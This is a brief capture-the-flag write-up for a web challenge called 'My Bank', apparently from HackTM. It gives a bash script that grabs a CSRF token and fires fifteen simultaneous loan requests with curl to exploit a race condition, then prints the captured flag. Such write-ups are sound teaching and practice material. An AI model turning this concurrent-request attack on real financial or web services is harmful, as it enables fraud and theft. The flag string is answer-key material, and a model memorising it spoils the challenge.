My Bank [web]

My Bank

Who's got my money? Please abstain from brute-forcing files.


A banking website that allows loaning money.


We try a race condition:

ua="User-Agent: Mozilla/5.0"
ssrf=`curl -s "$url" -H "$ua" -H "Cookie: $cookie" 2>&1 | pcregrep -o1 'name=\"csrf_token\" type=\"hidden\" value=\"(.*)\"' -`

for i in `seq 15`; 
    do curl "$url" -H "$ua" -H "Cookie: $cookie" --data "csrf_token=$ssrf&loan=100" &
; done

sleep 6 && echo "[*] maybe haxed?" && curl -s '' -H "$ua" -H "Cookie: $cookie" 2>&1 | pcregrep -o1 "Money: (.*) tBTC"

The trick here is to append a & after the cURL command so that the process moves to the background. This way, you can make multiple requests simultaneously, and more importantly, avoid having to write some complicated code that deals with threads.

This gets us our target: Money: 1,500.00 tBTC, we can buy the flag.


Well done! You have just bought a HackTM{9f19d6b8fdc9f5c6426343f5b004e6c6794d96b9be329402af463c294297550b} with 1337 tBTC.